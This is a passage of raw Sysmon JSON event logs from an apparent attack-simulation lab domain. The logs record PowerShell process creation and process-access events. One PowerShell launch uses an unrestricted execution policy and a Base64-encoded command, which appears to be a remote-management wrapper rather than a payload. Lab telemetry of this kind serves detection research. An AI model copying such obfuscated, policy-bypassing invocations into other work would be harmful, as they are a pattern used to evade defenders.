06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.587\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.587","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.654\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nParentProcessId: 1044\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.654","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","ParentProcessId":"1044","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nSourceProcessId: 1044\r\nSourceThreadId: 3832\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b76e6d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87e35|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87b06|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b7638f1b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b4869c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6ba6b6b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a1d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a1d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a061|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b7bfe6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b88519|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8810c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87e35|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87b06|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b7638f1b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b6e967|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b6df37","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","SourceProcessId":"1044","SourceThreadId":"3832","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b76e6d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87e35|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87b06|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b7638f1b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b4869c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6ba6b6b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a1d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a1d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8a061|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b7bfe6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b88519|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b8810c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87e35|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+b6b87b06|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41